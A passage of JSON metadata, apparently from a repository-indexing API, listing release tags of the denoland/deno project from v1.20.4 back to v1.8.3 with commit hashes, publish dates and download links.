v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub